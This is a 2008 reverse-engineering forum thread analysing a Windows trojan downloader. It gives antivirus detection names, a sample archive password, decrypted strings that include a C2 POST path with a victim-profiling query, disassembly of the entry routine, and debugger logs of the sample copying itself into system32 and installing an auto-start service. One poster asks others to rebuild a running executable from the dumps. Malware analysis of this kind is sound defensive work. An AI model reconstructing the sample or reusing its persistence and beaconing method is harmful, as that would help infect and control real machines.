Log in

View Full Version : Trojan.Win32.Agent.vie

OHPen
July 24th, 2008, 16:21
Scan taken on 24 Jul 2008 21:11:13 (GMT)
A-Squared Found nothing
AntiVir Found TR/Crypt.XPACK.Gen
ArcaVir Found Trojan.Downloader.Exchanger.Fz
Avast Found Win32:Trojan-gen {Other}
AVG Antivirus Found I-Worm/Nuwar.V
BitDefender Found Trojan.Downloader.JKHO
ClamAV Found Trojan.Exchanger-11
CPsecure Found Troj.Downloader.W32.Exchanger.fz
Dr.Web Found Trojan.DownLoader.62005
F-Prot Antivirus Found W32/Trojan2.AUFI
F-Secure Anti-Virus Found Trojan-Downloader:W32/Exchanger.AC, Trojan-Downloader.Win32.Exchanger.fz
Fortinet Found W32/Exchanger.FZ!tr.dldr
Ikarus Found Trojan.Crypt.XPACK
Kaspersky Anti-Virus Found Trojan-Downloader.Win32.Exchanger.fz
NOD32 Found Win32/Agent.ETH
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Sophos Antivirus Found Mal/EncPk-DA
VirusBuster Found nothing
VBA32 Found MalwareScope.Worm.Nuwar-Glowa.1

MALWARE

Password: "MALWARE"
blabberer
July 25th, 2008, 01:08
ah looks quiet cute fscking around with services

some strings after decryption

Code:


Text strings referenced in watchmov:.text

Address    Disassembly                               Text string

00401000   MOV     EAX, 1                            (Initial CPU selection)

0040104D   MOV     DWORD PTR SS:[ESP+14], watchmov.  ASCII "CbEvtSvc"

004010CA   PUSH    watchmov.00410C18                 UNICODE "-k"

004010D9   PUSH    watchmov.00410C20                 UNICODE "netsvcs"

0040110D   PUSH    watchmov.00410C18                 UNICODE "-k"

0040111C   PUSH    watchmov.00410C30                 UNICODE "console"

00401BE5   MOV     ECX, watchmov.00410E2C            ASCII "

"

00401FA4   PUSH    watchmov.00410DB0                 UNICODE "user"

00401FB1   PUSH    watchmov.00410DBC                 UNICODE "1.0.4"

00401FB8   PUSH    watchmov.00410DC8                 ASCII "geo=%s&os=%d&ver=%S&idx=%s&user=%S"

00402102   PUSH    watchmov.00410DEC                 ASCII "%s&ioctl=%d&data=%s

"

00402281   PUSH    watchmov.00410E04                 ASCII "D7EB6085-E70A-4f5a-9921-E6BD244A8C17"

0040240C   PUSH    watchmov.00410E30                 UNICODE "User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

004024A0   PUSH    watchmov.00410EB0                 UNICODE "ldrctl/ldrctl.php"

004024A5   PUSH    watchmov.00410ED4                 UNICODE "POST"

0040250A   PUSH    watchmov.00410EE0                 UNICODE "Connection: Close

Content-Type: application/x-www-form-urlencoded

"

00402516   PUSH    watchmov.00410EE0                 UNICODE "Connection: Close

Content-Type: application/x-www-form-urlencoded

"

00402E0E   ASCII   ";"",0

0040352F   PUSH    watchmov.00410F6C                 ASCII "SYSTEM\CurrentControlSet\Services\CbEvtSvc"

00403572   PUSH    watchmov.00410F98                 ASCII "Opt"

0040358E   PUSH    watchmov.00410F98                 ASCII "Opt"

004035C0   PUSH    watchmov.00410F98                 ASCII "Opt"

00403687   PUSH    watchmov.00410F6C                 ASCII "SYSTEM\CurrentControlSet\Services\CbEvtSvc"

004036B1   PUSH    watchmov.00410F98                 ASCII "Opt"

004036D2   PUSH    watchmov.00410F98                 ASCII "Opt"

00403722   PUSH    watchmov.00410F98                 ASCII "Opt"

004037AD   PUSH    watchmov.00410F9C                 ASCII "%s-%x

"

00403909   PUSH    watchmov.00410FA4                 ASCII "%s\%d.exe"

004039CA   PUSH    watchmov.00410E04                 ASCII "D7EB6085-E70A-4f5a-9921-E6BD244A8C17"

00403F33   PUSH    watchmov.00410FB8                 ASCII "CbEvtSvc.exe"

00403FF7   PUSH    watchmov.00410FC8                 ASCII "%SystemRoot%\System32\CbEvtSvc.exe -k netsvcs"

00404007   PUSH    watchmov.00410C0C                 ASCII "CbEvtSvc"

0040400C   PUSH    watchmov.00410C0C                 ASCII "CbEvtSvc"

0040411F   PUSH    watchmov.00410C0C                 ASCII "CbEvtSvc"

00404256   PUSH    watchmov.00410FF8                 ASCII "SeLoadDriverPrivilege"

004042F6   PUSH    watchmov.00410FF8                 ASCII "SeLoadDriverPrivilege"

00404BE1   MOV     EAX, watchmov.0040F26C            ASCII "Unknown exception"

004065A3   PUSH    watchmov.0040F324                 ASCII ".mixcrt"

00406601   PUSH    watchmov.0040F33C                 ASCII "KERNEL32.DLL"

0040661B   PUSH    watchmov.0040F32C                 ASCII "EncodePointer"

00406678   PUSH    watchmov.0040F33C                 ASCII "KERNEL32.DLL"

00406692   PUSH    watchmov.0040F34C                 ASCII "DecodePointer"

0040676A   PUSH    watchmov.0040F33C                 ASCII "KERNEL32.DLL"

00406795   PUSH    watchmov.0040F32C                 ASCII "EncodePointer"

004067AB   PUSH    watchmov.0040F34C                 ASCII "DecodePointer"

00406A37   PUSH    watchmov.0040F33C                 ASCII "KERNEL32.DLL"

00406A58   PUSH    watchmov.0040F37C                 ASCII "FlsAlloc"

00406A60   PUSH    watchmov.0040F370                 ASCII "FlsGetValue"

00406A6D   PUSH    watchmov.0040F364                 ASCII "FlsSetValue"

00406A7A   PUSH    watchmov.0040F35C                 ASCII "FlsFree"

00408EAC   PUSH    watchmov.0040F494                 ASCII "mscoree.dll"

00408EBB   PUSH    watchmov.0040F484                 ASCII "CorExitProcess"

004091FF   PUSH    watchmov.0040FA40                 ASCII "Runtime Error!



Program: "

00409247   PUSH    watchmov.0040FA28                 ASCII "<program name unknown>"

0040928C   PUSH    watchmov.0040FA24                 ASCII "..."

004092B4   PUSH    watchmov.0040FA20                 ASCII "



"

004092FB   PUSH    watchmov.0040F9F8                 ASCII "Microsoft Visual C++ Runtime Library"

0040BFF7   PUSH    watchmov.004103BC                 ASCII "kernel32.dll"

0040C006   PUSH    watchmov.00410394                 ASCII "InitializeCriticalSectionAndSpinCount"

0040C548   PUSH    watchmov.00410B4C                 ASCII "USER32.DLL"

0040C563   PUSH    watchmov.00410B40                 ASCII "MessageBoxA"

0040C579   MOV     DWORD PTR SS:[ESP], watchmov.004  ASCII "GetActiveWindow"

0040C58E   MOV     DWORD PTR SS:[ESP], watchmov.004  ASCII "GetLastActivePopup"

0040C5CA   PUSH    watchmov.00410B00                 ASCII "GetUserObjectInformationA"

0040C5E2   PUSH    watchmov.00410AE8                 ASCII "GetProcessWindowStation"

0040D70F   PUSH    watchmov.00410B98                 ASCII "CONOUT$"

0040DC86   PUSH    watchmov.00410BC4                 ASCII "string too long"

0040DD17   PUSH    watchmov.00410BD4                 ASCII "invalid string position"

0040EB5C   MOV     DWORD PTR SS:[EBP+8], watchmov.0  ASCII "bad exception"



winmain here

Code:


00401010           /$  55            PUSH    EBP

00401011           |.  8BEC          MOV     EBP, ESP

00401013           |.  83E4 F8       AND     ESP, FFFFFFF8

00401016           |.  81EC B4000000 SUB     ESP, 0B4

0040101C           |.  A1 34304100   MOV     EAX, DWORD PTR DS:[413034]

00401021           |.  33C4          XOR     EAX, ESP

00401023           |.  898424 B00000>MOV     DWORD PTR SS:[ESP+B0], EAX       ;  watchmov.0040557A

0040102A           |.  53            PUSH    EBX                              ;  watchmov.00414EE4

0040102B           |.  56            PUSH    ESI

0040102C           |.  57            PUSH    EDI                              ;  watchmov.00413600

0040102D           |.  8D4424 0C     LEA     EAX, DWORD PTR SS:[ESP+C]

00401031           |.  50            PUSH    EAX                              ; /pArgc = watchmov.0040557A

00401032           |.  BB 32000000   MOV     EBX, 32                          ; |

00401037           |.  FF15 BCF04000 CALL    NEAR DWORD PTR DS:[40F0BC]       ; |[GetCommandLineW

0040103D           |.  50            PUSH    EAX                              ; |CmdLine = "?P??.?????A??A??A??A??A??A??????A??????A??????A????E????????????????AA??A?????????A"

0040103E           |.  FF15 BCF14000 CALL    NEAR DWORD PTR DS:[40F1BC]       ; \CommandLineToArgvW

00401044           |.  8BF0          MOV     ESI, EAX                         ;  watchmov.0040557A

00401046           |.  33C0          XOR     EAX, EAX                         ;  watchmov.0040557A

00401048           |.  68 00104000   PUSH    watchmov.00401000                ; /pTopLevelFilter = watchmov.00401000

0040104D           |.  C74424 14 0C0>MOV     DWORD PTR SS:[ESP+14], watchmov.>; |ASCII "CbEvtSvc"

00401055           |.  C74424 18 104>MOV     DWORD PTR SS:[ESP+18], watchmov.>; |

0040105D           |.  894424 1C     MOV     DWORD PTR SS:[ESP+1C], EAX       ; |watchmov.0040557A

00401061           |.  894424 20     MOV     DWORD PTR SS:[ESP+20], EAX       ; |watchmov.0040557A

00401065           |.  FF15 B4F04000 CALL    NEAR DWORD PTR DS:[40F0B4]       ; \SetUnhandledExceptionFilter

0040106B           |.  8D4C24 20     LEA     ECX, DWORD PTR SS:[ESP+20]

0040106F           |.  51            PUSH    ECX                              ; /pVersionInformation = kernel32.7C809B49

00401070           |.  C74424 24 940>MOV     DWORD PTR SS:[ESP+24], 94        ; |

00401078           |.  FF15 C4F04000 CALL    NEAR DWORD PTR DS:[40F0C4]       ; \GetVersionExA

0040107E           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

00401080           |.  75 0B         JNZ     SHORT watchmov.0040108D

00401082           |.  FF15 B8F04000 CALL    NEAR DWORD PTR DS:[40F0B8]       ;  ntdll.RtlGetLastWin32Error

00401088           |.  E9 BC000000   JMP     watchmov.00401149

0040108D           |>  BF 02000000   MOV     EDI, 2

00401092           |.  397C24 30     CMP     DWORD PTR SS:[ESP+30], EDI       ;  watchmov.00413600

00401096           |.  0F85 AD000000 JNZ     watchmov.00401149

0040109C           |.  E8 1F320000   CALL    watchmov.004042C0

004010A1           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

004010A3           |.  75 12         JNZ     SHORT watchmov.004010B7

004010A5           |.  E8 86310000   CALL    watchmov.00404230

004010AA           |.  E8 11320000   CALL    watchmov.004042C0

004010AF           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

004010B1           |.  0F84 92000000 JE      watchmov.00401149

004010B7           |>  397C24 0C     CMP     DWORD PTR SS:[ESP+C], EDI        ;  watchmov.00413600

004010BB           |.  0F8E 81000000 JLE     watchmov.00401142

004010C1           |.  8B56 04       MOV     EDX, DWORD PTR DS:[ESI+4]

004010C4           |.  8B3D B0F04000 MOV     EDI, DWORD PTR DS:[40F0B0]       ;  kernel32.lstrcmpiW

004010CA           |.  68 180C4100   PUSH    watchmov.00410C18                ; /String2 = "-k"

004010CF           |.  52            PUSH    EDX                              ; |String1 = "??"

004010D0           |.  FFD7          CALL    NEAR EDI                         ; \lstrcmpiW

004010D2           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

004010D4           |.  75 34         JNZ     SHORT watchmov.0040110A

004010D6           |.  8B46 08       MOV     EAX, DWORD PTR DS:[ESI+8]

004010D9           |.  68 200C4100   PUSH    watchmov.00410C20                ; /String2 = "netsvcs"

004010DE           |.  50            PUSH    EAX                              ; |String1 = "?P??.?????A??A??A??A??A??A??????A??????A??????A????E????????????????AA??A?????????A"

004010DF           |.  FFD7          CALL    NEAR EDI                         ; \lstrcmpiW

004010E1           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

004010E3           |.  75 25         JNZ     SHORT watchmov.0040110A

004010E5           |.  8D4C24 10     LEA     ECX, DWORD PTR SS:[ESP+10]

004010E9           |.  51            PUSH    ECX                              ; /pServiceTable = kernel32.7C809B49

004010EA           |.  FF15 3CF04000 CALL    NEAR DWORD PTR DS:[40F03C]       ; \StartServiceCtrlDispatcherA

004010F0           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

004010F2           |.  75 07         JNZ     SHORT watchmov.004010FB

004010F4           |.  BB 41060000   MOV     EBX, 641

004010F9           |.  EB 4E         JMP     SHORT watchmov.00401149

004010FB           |>  8B15 644B4100 MOV     EDX, DWORD PTR DS:[414B64]

00401101           |.  6A FF         PUSH    -1                               ; /Timeout = INFINITE

00401103           |.  52            PUSH    EDX                              ; |hObject = 7C90E4F4

00401104           |.  FF15 70F04000 CALL    NEAR DWORD PTR DS:[40F070]       ; \WaitForSingleObject

0040110A           |>  8B46 04       MOV     EAX, DWORD PTR DS:[ESI+4]

0040110D           |.  68 180C4100   PUSH    watchmov.00410C18                ; /String2 = "-k"

00401112           |.  50            PUSH    EAX                              ; |String1 = "?P??.?????A??A??A??A??A??A??????A??????A??????A????E????????????????AA??A?????????A"

00401113           |.  FFD7          CALL    NEAR EDI                         ; \lstrcmpiW

00401115           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

00401117           |.  75 30         JNZ     SHORT watchmov.00401149

00401119           |.  8B4E 08       MOV     ECX, DWORD PTR DS:[ESI+8]

0040111C           |.  68 300C4100   PUSH    watchmov.00410C30                ; /String2 = "console"

00401121           |.  51            PUSH    ECX                              ; |String1 = "????.??????????????????0????."

00401122           |.  FFD7          CALL    NEAR EDI                         ; \lstrcmpiW

00401124           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

00401126           |.  75 21         JNZ     SHORT watchmov.00401149

00401128           |.  E8 832A0000   CALL    watchmov.00403BB0

0040112D           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A

0040112F           |.  75 18         JNZ     SHORT watchmov.00401149

00401131           |.  50            PUSH    EAX                              ; /Style = A|70|MB_DEFBUTTON2|MB_SYSTEMMODAL|404400

00401132           |.  50            PUSH    EAX                              ; |Title = "è?P"

00401133           |.  50            PUSH    EAX                              ; |Text = "è?P"

00401134           |.  50            PUSH    EAX                              ; |hOwner = 0040557A

00401135           |.  FF15 C4F14000 CALL    NEAR DWORD PTR DS:[40F1C4]       ; \MessageBoxA

0040113B           |.  E8 702C0000   CALL    watchmov.00403DB0

00401140           |.  EB 07         JMP     SHORT watchmov.00401149

00401142           |>  E8 692D0000   CALL    watchmov.00403EB0

00401147           |.  8BD8          MOV     EBX, EAX                         ;  watchmov.0040557A

00401149           |>  56            PUSH    ESI                              ; /hMemory = FFFFFFEC

0040114A           |.  FF15 C0F04000 CALL    NEAR DWORD PTR DS:[40F0C0]       ; \LocalFree

00401150           |.  8B8C24 BC0000>MOV     ECX, DWORD PTR SS:[ESP+BC]

00401157           |.  5F            POP     EDI                              ;  kernel32.7C817067

00401158           |.  5E            POP     ESI                              ;  kernel32.7C817067

00401159           |.  8BC3          MOV     EAX, EBX                         ;  watchmov.00414EE4

0040115B           |.  5B            POP     EBX                              ;  kernel32.7C817067

0040115C           |.  33CC          XOR     ECX, ESP

0040115E           |.  E8 95350000   CALL    watchmov.004046F8

00401163           |.  8BE5          MOV     ESP, EBP

00401165           |.  5D            POP     EBP                              ;  kernel32.7C817067

00401166           \.  C2 1000       RETN    10



some piecemeal dumps when on oep

can some one try and piece this together to form a real running pe file

oep here

Code:


0040557A           |.  E8 3F500000   CALL    watchmov.0040A5BE

0040557F           \.^ E9 16FEFFFF   JMP     watchmov.0040539A

00405584           />  55            PUSH    EBP

00405585           |.  8BEC          MOV     EBP, ESP



edit

this fscker is going to copy itself to system directory as cbevtsvc

Code:


0012FC38   00403F8F  /CALL to CopyFileA from watchmov.00403F89

0012FC3C   0012FD58  |ExistingFileName = "C:\Documents and Settings\Cp m\Desktop\watchmovie[1].mpg\watchmovie.mpg.exe"

0012FC40   0012FC50  |NewFileName = "C:\WINDOWS\system32\CbEvtSvc.exe"

0012FC44   00000000  \FailIfExists = FALSE


and then start the service

Code:


C:\>fc "c:\Documents and Settings\Cp m\Desktop\watchmovie[1].mpg\watchmovie.mpg.

exe" c:\WINDOWS\system32\CbEvtSvc.exe

Comparing files C:\DOCUMENTS AND SETTINGS\CP M\DESKTOP\WATCHMOVIE[1].MPG\watchmo

vie.mpg.exe and C:\WINDOWS\SYSTEM32\CBEVTSVC.EXE

FC: no differences encountered



and then create a service



0012FC08   00404018  /CALL to CreateServiceA from watchmov.00404012

0012FC0C   00148718  |hManager = 00148718

0012FC10   00410C0C  |ServiceName = "CbEvtSvc"

0012FC14   00410C0C  |DisplayName = "CbEvtSvc"

0012FC18   000F003F  |DesiredAccess = SERVICE_QUERY_CONFIG|SERVICE_CHANGE_CONFIG|SERVICE_QUERY_STATUS|SERVICE_ENUMERATE_DEPENDENTS|SERVICE _START|SERVICE_STOP|F0000

0012FC1C   00000010  |ServiceType = SERVICE_WIN32_OWN_PROCESS

0012FC20   00000002  |StartType = SERVICE_AUTO_START

0012FC24   00000001  |ErrorControl = SERVICE_ERROR_NORMAL

0012FC28   00410FC8  |BinaryPathName = "%SystemRoot%\System32\CbEvtSvc.exe -k netsvcs"

0012FC2C   00000000  |LoadOrderGroup = NULL

0012FC30   00000000  |pTagId = NULL

0012FC34   00000000  |pDependencies = NULL

0012FC38   00000000  |ServiceStartName = NULL

0012FC3C   00000000  \Password = NULL